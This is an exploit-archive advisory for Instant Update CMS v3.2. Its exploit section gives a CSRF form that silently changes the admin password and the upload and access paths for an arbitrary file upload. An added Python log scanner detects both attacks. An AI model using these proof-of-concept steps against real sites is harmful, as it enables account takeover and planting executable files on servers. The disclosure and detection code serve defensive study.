Instant Update CMS v3.2 Arbitrary File Upload/CSRF Vulnerabilities

2012-06-01T00:00:00
ID 1337DAY-ID-18408
Type zdt
Reporter AtT4CKxT3rR0r1ST
Modified 2012-06-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
Instant Update CMS v3.2 Arbitrary File Upload/CSRF Vulnerabilities
=======================================================================

#######################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.cubescripts.com/cms-script.php

#######################################################################

===[ Exploit ]===


CSRF [Change Password Admin]
=============================

<form method="POST" name="form1" action="http://SITE/manage/savechngdpasswd.php">
<input type="hidden" name="pass1" value="password"/>
<input type="hidden" name="pass2" value="Password"/>
<input type="hidden" name="image.x" value="33"/>
<input type="hidden" name="image.y" value="11"/>
<input type="hidden" name="image" value="edit"/>
</form>

</body>
</html>


Remote Arbitrary File Upload
================================


http://SITE/manage/scripts/assetmanager/assetmanager.php?ffilter=media

Your File

http://SITE/UserFiles/

#######################################################################
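
Detection example for the two issues above, added here and not part of the original advisory or the vendor's code: it scans web access logs for password-change POSTs whose Referer is not the site itself and for script requests under /UserFiles/. The combined log format, the host name cms.example.test, the rule names and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx "combined" log format (assumed; adjust the regex for other formats).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)
PASSWD = "/manage/savechngdpasswd.php"
UPLOADER = "/manage/scripts/assetmanager/assetmanager.php"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

SAMPLE_LOG = [  # constructed sample lines, not taken from a real server
    '198.51.100.7 - - [01/Jun/2012:10:00:01 +0000] "POST /manage/savechngdpasswd.php HTTP/1.1" 302 0 "http://other.example/page.html" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jun/2012:10:02:00 +0000] "POST /manage/savechngdpasswd.php HTTP/1.1" 302 0 "http://cms.example.test/manage/" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jun/2012:10:05:00 +0000] "GET /manage/scripts/assetmanager/assetmanager.php?ffilter=media HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Jun/2012:10:05:30 +0000] "GET /UserFiles/a.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jun/2012:10:06:00 +0000] "GET /UserFiles/logo.png HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def scan(lines, site_host):
    """Return (line_no, rule, client_ip) findings for the two issues in the advisory."""
    findings, uploader_clients = [], set()
    for no, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = urlsplit(m["target"]).path
        ref_host = urlsplit(m["referer"]).hostname  # None when Referer is "-" or empty
        if m["method"] == "POST" and path == PASSWD and ref_host != site_host:
            # Password change submitted from another origin, or with no Referer.
            findings.append((no, "csrf-password-change", m["ip"]))
        elif path == UPLOADER:
            uploader_clients.add(m["ip"])
        elif path.startswith("/UserFiles/") and SCRIPT_EXT.search(path):
            # Script requested from the upload directory; stronger signal if this
            # client used the asset manager earlier in the same log.
            rule = "upload-then-exec" if m["ip"] in uploader_clients else "script-in-userfiles"
            findings.append((no, rule, m["ip"]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG, "cms.example.test"):
        print(finding)
```

A missing Referer is reported as well, since some browsers and proxies strip the header; treat those hits as lower confidence than a foreign Referer.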


